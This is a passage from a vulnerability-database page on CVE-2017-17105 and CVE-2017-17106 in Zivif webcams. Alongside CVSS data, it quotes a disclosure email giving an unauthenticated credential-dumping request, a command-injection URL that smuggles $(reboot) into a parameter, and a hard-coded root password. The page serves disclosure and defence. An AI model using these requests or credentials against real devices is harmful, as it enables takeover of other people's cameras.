"id": "CNVD-2018-01359",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-108095",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-17106",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-17106",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-01359",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201712-146",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-108095",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-17106",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"db": "VULHUB",
"id": "VHN-108095"
},
{
"db": "VULMON",
"id": "CVE-2017-17106"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"db": "NVD",
"id": "CVE-2017-17106"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Credentials for Zivif PR115-204-P-RS V2.3.4.2103 Webcams can be obtained by an unauthenticated remote attacker using a standard web /cgi-bin/hi3510/param.cgi?cmd=getuser HTTP request. This vulnerability exists because of a lack of authentication checks in requests to CGI pages. Zivif Web The camera contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. Attack vector: Remote\nAuthentication: None\nResearcher: Silas Cutler `p1nk` \u003csilas.cutler@blacklistthisdomain.com\u003e\nRelease date: December 10, 2017\nFull Disclosure: 90 days\nCVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107\nVulnerable Device: Zivif PR115-204-P-RS\nVersion: V2.3.4.2103\n\n\nTimeline:\n1 September 2017: Initial alerting to Zivif\n1 September 2017: Zivif contact established. \n3 September 2017: Details provided. \n7 September 2017: Confirmation of vulnerabilities from Zivif\n5 December 2017: Public note on Social Media CVE-2017-17105,\nCVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. \n10 December 2017: This email\n\n\n-[Overview]-\nImplementation of access controls is Zivif cameras is severely lacking. \n\nThis was first identified with the following request (CVE-2017-17106)\nhttp://\u003cCamera Address\u003e/web/cgi-bin/hi3510/param.cgi?cmd=getuser\nCameras respond to this with:\n\nvar name0=\"admin\"; var password0=\"admin\"; var authLevel0=\"255\"; var\nname1=\"guest\"; var password1=\"guest\"; var authLevel1=\"3\"; var\nname2=\"admin2\"; var password2=\"admin\"; var authLevel2=\"3\"; var name3=\"\";\nvar password3=\"\"; var authLevel3=\"3\"; var name4=\"\"; var password4=\"\";\nvar authLevel4=\"3\"; var name5=\"\"; var password5=\"\"; var authLevel5=\"3\";\nvar name6=\"\"; var password6=\"\"; var authLevel6=\"3\"; var name7=\"\"; var\npassword7=\"\"; var authLevel7=\"3\"; var name8=\"\"; var password8=\"\"; var\nauthLevel8=\"0\"; var name9=\"\"; var password9=\"\"; var authLevel9=\"0\nCredentials are returned in cleartext to the requester. \n\nIn exploring, unauthenticated remote command injection is possible using\n(CVE-2017-17105)\nhttp://\u003cCamera\nIP\u003e/cgi-bin/iptest.cgi?cmd=iptest.cgi\u0026-time=\"1504225666237\"\u0026-url=$(reboot)\n\nCommand results are not returned, however are executed by the system. \n\nOne last findings was the /etc/passwd file contains the following\nhard-coded entry (CVE-2017-17107):\nroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh\n\nThe encrypted password is cat1029. \n\n(none) login: root\nPassword:\nLogin incorrect\n(none) login: root\nPassword:\nWelcome to SONIX. \n\\u@\\h:\\W$\nBecause of the way the file system is structured, changing this password\nrequires more work then running passwd. \n\n-[Note]-\nThe hi3510 is shared with a couple other cameras I\u0027m exploring. The\nmotd saying /Welcome to SONIX/ has lead me to speculate parts of this\nfirmware may be shared with other cameras. \n\n\n\n-Silas\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17106"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"db": "VULHUB",
"id": "VHN-108095"
},
{
"db": "VULMON",
"id": "CVE-2017-17106"
},
{
"db": "PACKETSTORM",
"id": "145386"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-17106",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "145386",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011811",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201712-146",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-01359",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-108095",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-17106",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"db": "VULHUB",
"id": "VHN-108095"
},
{
"db": "VULMON",
"id": "CVE-2017-17106"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17106"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
]
},
"id": "VAR-201712-0829",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"db": "VULHUB",
"id": "VHN-108095"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01359"
}
]
},
"last_update_date": "2023-12-18T12:37:03.667000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://zivif.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108095"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"db": "NVD",
"id": "CVE-2017-17106"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html"
},
{
"trust": 2.6,
"url": "https://twitter.com/silascutler/status/938052460328968192"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2017/dec/42"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17106"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17106"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/522.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://\u003ccamera"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17107"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17105"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"db": "VULHUB",
"id": "VHN-108095"
},
{
"db": "VULMON",
"id": "CVE-2017-17106"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17106"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"db": "VULHUB",
"id": "VHN-108095"
},
{
"db": "VULMON",
"id": "CVE-2017-17106"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "NVD",
"id": "CVE-2017-17106"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"date": "2017-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-108095"
},
{
"date": "2017-12-19T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17106"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"date": "2017-12-13T16:50:24",
"db": "PACKETSTORM",
"id": "145386"
},
{
"date": "2017-12-19T02:29:41.597000",
"db": "NVD",
"id": "CVE-2017-17106"
},
{
"date": "2017-12-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01359"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-108095"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17106"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011811"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2017-17106"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Zivif Web Vulnerabilities related to certificate / password management in cameras",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011811"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-146"
}
],
"trust": 0.6
}
}
VAR-201712-0828
Vulnerability from variot - Updated: 2023-12-18 12:37Zivif PR115-204-P-RS V2.3.4.2103 and V4.7.4.2121 (and possibly in-between versions) web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) request. Zivif Web The camera contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. A remote command injection vulnerability exists in the ZivifPR115-204-P-RS2.3.4.2103 release. A remote attacker can exploit this vulnerability to inject arbitrary commands. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. Attack vector: Remote
Authentication: None
Researcher: Silas Cutler p1nk silas.cutler@blacklistthisdomain.com
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103
Timeline: 1 September 2017: Initial alerting to Zivif 1 September 2017: Zivif contact established. 3 September 2017: Details provided. 7 September 2017: Confirmation of vulnerabilities from Zivif 5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. 10 December 2017: This email
-[Overview]- Implementation of access controls is Zivif cameras is severely lacking. As a result, CGI functions can be called directly, bypassing authentication checks.
This was first identified with the following request (CVE-2017-17106) http:///web/cgi-bin/hi3510/param.cgi?cmd=getuser Cameras respond to this with:
var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0 Credentials are returned in cleartext to the requester.
One last findings was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107): root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
The encrypted password is cat1029.
(none) login: root Password: Login incorrect (none) login: root Password: Welcome to SONIX. \u@\h:\W$ Because of the way the file system is structured, changing this password requires more work then running passwd.
-[Note]- The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has lead me to speculate parts of this firmware may be shared with other cameras.
-Silas
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0828",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pr115-204-p-rs",
"scope": "eq",
"trust": 3.0,
"vendor": "zivif",
"version": "2.3.4.2103"
},
{
"model": "pr115-204-p-rs",
"scope": "eq",
"trust": 1.0,
"vendor": "zivif",
"version": "4.7.4.2121"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zivif:pr115-204-p-rs_firmware:4.7.4.2121:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:zivif:pr115-204-p-rs_firmware:2.3.4.2103:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zivif:pr115-204-p-rs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Silas Cutler",
"sources": [
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
],
"trust": 0.7
},
"cve": "CVE-2017-17105",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-17105",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-01360",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-108094",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-17105",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-17105",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-01360",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201712-147",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-108094",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-17105",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Zivif PR115-204-P-RS V2.3.4.2103 and V4.7.4.2121 (and possibly in-between versions) web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi\u0026-time=\"1504225666237\"\u0026-url=$(reboot) request. Zivif Web The camera contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. A remote command injection vulnerability exists in the ZivifPR115-204-P-RS2.3.4.2103 release. A remote attacker can exploit this vulnerability to inject arbitrary commands. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. Attack vector: Remote\nAuthentication: None\nResearcher: Silas Cutler `p1nk` \u003csilas.cutler@blacklistthisdomain.com\u003e\nRelease date: December 10, 2017\nFull Disclosure: 90 days\nCVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107\nVulnerable Device: Zivif PR115-204-P-RS\nVersion: V2.3.4.2103\n\n\nTimeline:\n1 September 2017: Initial alerting to Zivif\n1 September 2017: Zivif contact established. \n3 September 2017: Details provided. \n7 September 2017: Confirmation of vulnerabilities from Zivif\n5 December 2017: Public note on Social Media CVE-2017-17105,\nCVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. \n10 December 2017: This email\n\n\n-[Overview]-\nImplementation of access controls is Zivif cameras is severely lacking. \nAs a result, CGI functions can be called directly, bypassing\nauthentication checks. \n\nThis was first identified with the following request (CVE-2017-17106)\nhttp://\u003cCamera Address\u003e/web/cgi-bin/hi3510/param.cgi?cmd=getuser\nCameras respond to this with:\n\nvar name0=\"admin\"; var password0=\"admin\"; var authLevel0=\"255\"; var\nname1=\"guest\"; var password1=\"guest\"; var authLevel1=\"3\"; var\nname2=\"admin2\"; var password2=\"admin\"; var authLevel2=\"3\"; var name3=\"\";\nvar password3=\"\"; var authLevel3=\"3\"; var name4=\"\"; var password4=\"\";\nvar authLevel4=\"3\"; var name5=\"\"; var password5=\"\"; var authLevel5=\"3\";\nvar name6=\"\"; var password6=\"\"; var authLevel6=\"3\"; var name7=\"\"; var\npassword7=\"\"; var authLevel7=\"3\"; var name8=\"\"; var password8=\"\"; var\nauthLevel8=\"0\"; var name9=\"\"; var password9=\"\"; var authLevel9=\"0\nCredentials are returned in cleartext to the requester. \n\nOne last findings was the /etc/passwd file contains the following\nhard-coded entry (CVE-2017-17107):\nroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh\n\nThe encrypted password is cat1029. \n\n(none) login: root\nPassword:\nLogin incorrect\n(none) login: root\nPassword:\nWelcome to SONIX. \n\\u@\\h:\\W$\nBecause of the way the file system is structured, changing this password\nrequires more work then running passwd. \n\n-[Note]-\nThe hi3510 is shared with a couple other cameras I\u0027m exploring. The\nmotd saying /Welcome to SONIX/ has lead me to speculate parts of this\nfirmware may be shared with other cameras. \n\n\n\n-Silas\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "PACKETSTORM",
"id": "145386"
}
],
"trust": 2.43
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-108094",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108094"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-17105",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "145386",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "158120",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-01360",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2020060066",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-108094",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-17105",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "PACKETSTORM",
